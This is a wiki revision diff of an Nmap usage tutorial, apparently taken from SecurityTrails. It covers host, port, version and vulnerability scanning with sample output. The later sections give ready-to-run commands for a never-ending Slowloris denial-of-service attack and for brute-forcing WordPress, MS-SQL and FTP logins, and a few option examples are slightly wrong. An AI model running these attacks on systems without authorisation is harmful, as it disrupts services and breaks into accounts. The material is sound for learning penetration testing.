Nmap:Penggunaan: Difference between revisions
No edit summary |
No edit summary |
||
| Line 4: | Line 4: | ||
===1. Basic Nmap Scan against IP or host=== | ===1. Basic Nmap Scan against IP or host=== | ||
nmap 1.1.1.1 | {{Terminal|nmap 1.1.1.1}} | ||
Now, if you want to scan a hostname, simply replace the IP for the host, as you see below: | Now, if you want to scan a hostname, simply replace the IP for the host, as you see below: | ||
nmap cloudflare.com | {{Terminal|nmap cloudflare.com}} | ||
This kind of scans, such as the Nmap scan host are perfect for your first steps when starting with Nmap. | This kind of scans, such as the Nmap scan host are perfect for your first steps when starting with Nmap. | ||
===2. Nmap Ping Scan=== | ===2. Nmap Ping Scan=== | ||
nmap -sp 192.168.5.0/24 | {{Terminal|nmap -sp 192.168.5.0/24}} | ||
The most famous type of scan is the Nmap ping scan (so-called because it’s often used to perform Nmap ping sweeps), and it’s the easiest way to detect hosts on any network. | The most famous type of scan is the Nmap ping scan (so-called because it’s often used to perform Nmap ping sweeps), and it’s the easiest way to detect hosts on any network. | ||
| Line 19: | Line 19: | ||
===3. Scan specific ports or scan entire port ranges on a local or remote server=== | ===3. Scan specific ports or scan entire port ranges on a local or remote server=== | ||
nmap -p 1-65535 localhost | {{Terminal|nmap -p 1-65535 localhost}} | ||
In this example, we scanned all 65535 ports for our localhost computer. | In this example, we scanned all 65535 ports for our localhost computer. | ||
Nmap is able to scan all possible ports, but you can also scan specific ports, which will report faster results. See below: | Nmap is able to scan all possible ports, but you can also scan specific ports, which will report faster results. See below: | ||
nmap -p 80,443 8.8.8.8 | {{Terminal|nmap -p 80,443 8.8.8.8}} | ||
===4. Scan multiple IP addresses=== | ===4. Scan multiple IP addresses=== | ||
Let’s try to scan multiple IP addresses. For this you need to use this syntax: | Let’s try to scan multiple IP addresses. For this you need to use this syntax: | ||
nmap 1.1.1.1 8.8.8.8 | {{Terminal|nmap 1.1.1.1 8.8.8.8}} | ||
You can also scan consecutive IP addresses: | You can also scan consecutive IP addresses: | ||
nmap 1.1.1.1,2,3,4 | {{Terminal|nmap 1.1.1.1,2,3,4}} | ||
This will scan 1.1.1.1, 1.1.1.2, 1.1.1.3 and 1.1.1.4. | This will scan 1.1.1.1, 1.1.1.2, 1.1.1.3 and 1.1.1.4. | ||
| Line 37: | Line 37: | ||
===5. Scan IP ranges=== | ===5. Scan IP ranges=== | ||
You can also use Nmap to scan entire CIDR IP ranges, for example: | You can also use Nmap to scan entire CIDR IP ranges, for example: | ||
nmap 8.8.8.0/28 | {{Terminal|nmap 8.8.8.0/28}} | ||
This will scan 14 consecutive IP ranges, from 8.8.8.1 to 8.8.8.14. | This will scan 14 consecutive IP ranges, from 8.8.8.1 to 8.8.8.14. | ||
An alternative is to simply use this kind of range: | An alternative is to simply use this kind of range: | ||
nmap 8.8.8.1-14 | {{Terminal|nmap 8.8.8.1-14}} | ||
You can even use wildcards to scan the entire C class IP range, for example: | You can even use wildcards to scan the entire C class IP range, for example: | ||
nmap 8.8.8.* | {{Terminal|nmap 8.8.8.*}} | ||
This will scan 256 IP addresses from 8.8.8.1 to 8.8.8.256. | This will scan 256 IP addresses from 8.8.8.1 to 8.8.8.256. | ||
If you ever need to exclude certain IPs from the IP range scan, you can use the “–exclude” option, as you see below: | If you ever need to exclude certain IPs from the IP range scan, you can use the “–exclude” option, as you see below: | ||
nmap -p 8.8.8.* --exclude 8.8.8.1 | {{Terminal|nmap -p 8.8.8.* --exclude 8.8.8.1}} | ||
===6. Scan the most popular ports=== | ===6. Scan the most popular ports=== | ||
Using “<code>–top-ports</code>” parameter along with a specific number lets you scan the top X most common ports for that host, as we can see: | Using “<code>–top-ports</code>” parameter along with a specific number lets you scan the top X most common ports for that host, as we can see: | ||
nmap --top-ports 20 192.168.1.106 | {{Terminal|nmap --top-ports 20 192.168.1.106}} | ||
Replace “20” with the desired number. Output example: | Replace “20” with the desired number. Output example: | ||
{{Example|Output Terminal}} | |||
[root@securitytrails:~]nmap --top-ports 20 localhost | [root@securitytrails:~]nmap --top-ports 20 localhost | ||
Starting Nmap 6.40 ( http://nmap.org ) at 2018-10-01 10:02 EDT | Starting Nmap 6.40 ( http://nmap.org ) at 2018-10-01 10:02 EDT | ||
| Line 89: | Line 90: | ||
Let’s suppose you create a list.txt file that contains these lines inside: | Let’s suppose you create a list.txt file that contains these lines inside: | ||
{{Example|File .txt}} | |||
192.168.1.106 | 192.168.1.106 | ||
cloudflare.com | cloudflare.com | ||
| Line 95: | Line 98: | ||
The “-<code>iL</code>” parameter lets you read from that file, and scan all those hosts for you: | The “-<code>iL</code>” parameter lets you read from that file, and scan all those hosts for you: | ||
nmap -iL list.txt | {{Terminal|nmap -iL list.txt}} | ||
===8. Save your Nmap scan results to a file=== | ===8. Save your Nmap scan results to a file=== | ||
On the other hand, in the following example we will not be reading from a file, but exporting/saving our results into a text file: | On the other hand, in the following example we will not be reading from a file, but exporting/saving our results into a text file: | ||
nmap -oN output.txt securitytrails.com | {{Terminal|nmap -oN output.txt securitytrails.com}} | ||
Nmap has the ability to export files into XML format as well, see the next example: | Nmap has the ability to export files into XML format as well, see the next example: | ||
nmap -oX output.xml securitytrails.com | {{Terminal|nmap -oX output.xml securitytrails.com}} | ||
===9. Disabling DNS name resolution=== | ===9. Disabling DNS name resolution=== | ||
If you need to speed up your scans a little bit, you can always choose to disable reverse DNS resolution for all your scans. Just add the “-n” parameter. | If you need to speed up your scans a little bit, you can always choose to disable reverse DNS resolution for all your scans. Just add the “-n” parameter. | ||
{{Example|Output Terminal}} | |||
[root@securitytrails:~]nmap -p 80 -n 8.8.8.8 | [root@securitytrails:~]nmap -p 80 -n 8.8.8.8 | ||
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:15 -03 | Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:15 -03 | ||
| Line 116: | Line 120: | ||
See the difference with a normal DNS-resolution enabled scan: | See the difference with a normal DNS-resolution enabled scan: | ||
{{Example|Output Terminal}} | |||
[root@securitytrails:~]nmap -p 80 8.8.8.8 | [root@securitytrails:~]nmap -p 80 8.8.8.8 | ||
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:15 -03 | Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:15 -03 | ||
| Line 125: | Line 130: | ||
===10. Scan + OS and service detection with fast execution=== | ===10. Scan + OS and service detection with fast execution=== | ||
Using the “<code>-A</code>” parameter enables you to perform OS and service detection, and at the same time we are combining this with “<code>-T4</code>” for faster execution. See the example below: | Using the “<code>-A</code>” parameter enables you to perform OS and service detection, and at the same time we are combining this with “<code>-T4</code>” for faster execution. See the example below: | ||
nmap -A -T4 cloudflare.com | {{Terminal|nmap -A -T4 cloudflare.com}} | ||
===11. Detect service/daemon versions=== | ===11. Detect service/daemon versions=== | ||
This can be done by using <code>-sV</code> parameters | This can be done by using <code>-sV</code> parameters | ||
nmap -sV localhost | {{Terminal|nmap -sV localhost}} | ||
As you can see here: | As you can see here: | ||
{{Example|Output Terminal}} | |||
[root@securitytrails:~]nmap -sV localhost | [root@securitytrails:~]nmap -sV localhost | ||
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:28 -03 | Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:28 -03 | ||
| Line 150: | Line 157: | ||
Standard TCP scanning output: | Standard TCP scanning output: | ||
{{Example|Output Terminal}} | |||
[root@securitytrails:~]nmap -sT 192.168.1.1 | [root@securitytrails:~]nmap -sT 192.168.1.1 | ||
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:33 -03 | Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:33 -03 | ||
| Line 164: | Line 173: | ||
UDP scanning results using “<code>-sU</code>” parameter: | UDP scanning results using “<code>-sU</code>” parameter: | ||
{{Example|Output Terminal}} | |||
[root@securitytrails:~]nmap -sU localhost | [root@securitytrails:~]nmap -sU localhost | ||
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:37 -03 | Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:37 -03 | ||
| Line 179: | Line 190: | ||
Using Nmap scripts is crucial in order to automate system and vulnerability scans. For example, if you want to run a full vulnerability test against your target, you can use these parameters: | Using Nmap scripts is crucial in order to automate system and vulnerability scans. For example, if you want to run a full vulnerability test against your target, you can use these parameters: | ||
nmap -Pn --script vuln 192.168.1.105 | {{Terminal|nmap -Pn --script vuln 192.168.1.105}} | ||
Output example: | Output example: | ||
{{Example|Output Terminal}} | |||
[root@securitytrails:~]nmap -Pn --script vuln 192.168.1.105 | [root@securitytrails:~]nmap -Pn --script vuln 192.168.1.105 | ||
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:46 -03 | Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:46 -03 | ||
| Line 224: | Line 237: | ||
In our previous example (#12) we found the host was vulnerable to Slowloris attack, and now we’ll try to exploit that vulnerability by launching a DOS attack in a forever loop: | In our previous example (#12) we found the host was vulnerable to Slowloris attack, and now we’ll try to exploit that vulnerability by launching a DOS attack in a forever loop: | ||
nmap 192.168.1.105 -max-parallelism 800 -Pn --script http-slowloris --script-args http-slowloris.runforever=true | {{Terminal|<nowiki>nmap 192.168.1.105 -max-parallelism 800 -Pn --script http-slowloris --script-args http-slowloris.runforever=true</nowiki>}} | ||
===15. Launching brute force attacks=== | ===15. Launching brute force attacks=== | ||
| Line 230: | Line 243: | ||
WordPress brute force attack: | WordPress brute force attack: | ||
nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress brute.hostname=domain.com, http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.1.105 | {{Terminal|<nowiki>nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress brute.hostname=domain.com, http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.1.105</nowiki>}} | ||
Brute force attack against MS-SQL: | Brute force attack against MS-SQL: | ||
nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 192.168.1.105 | {{Terminal|<nowiki>nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 192.168.1.105</nowiki>}} | ||
FTP brute force attack: | FTP brute force attack: | ||
nmap --script ftp-brute -p 21 192.168.1.105 | {{Terminal|nmap --script ftp-brute -p 21 192.168.1.105}} | ||
===16. Detecting malware infections on remote hosts=== | ===16. Detecting malware infections on remote hosts=== | ||
| Line 242: | Line 255: | ||
A common malware scan can be performed by using: | A common malware scan can be performed by using: | ||
nmap -sV --script=http-malware-host 192.168.1.105 | {{Terminal|<nowiki>nmap -sV --script=http-malware-host 192.168.1.105</nowiki>}} | ||
Or using Google’s Malware check: | Or using Google’s Malware check: | ||
nmap -p80 --script http-google-malware infectedsite.com | {{Terminal|nmap -p80 --script http-google-malware infectedsite.com}} | ||
Output | {{Example|Output Terminal}} | ||
80/tcp open http | 80/tcp open http | ||
|_http-google-malware.nse: Host is known for distributing malware. | |_http-google-malware.nse: Host is known for distributing malware. | ||
| Line 255: | Line 268: | ||
Today we covered the top fifteen Nmap commands to scan remote hosts, but there’s a lot more to discover if you’re starting to use Nmap in your OSINT strategy. | Today we covered the top fifteen Nmap commands to scan remote hosts, but there’s a lot more to discover if you’re starting to use Nmap in your OSINT strategy. | ||
{{Note|The articles, tutorial and demo provided on Hackers Terminal is for informational and educational purpose only, and for those who’re willing and curious to know and learn about Ethical Hacking, Security and Penetration Testing. Any time the word “Hacking” that is used on this site shall be regarded as Ethical Hacking.}} | |||
The articles, tutorial and demo provided on Hackers Terminal is for informational and educational purpose only, and for those who’re willing and curious to know and learn about Ethical Hacking, Security and Penetration Testing. Any time the word “Hacking” that is used on this site shall be regarded as Ethical Hacking. | |||
==Terkait== | ==Terkait== | ||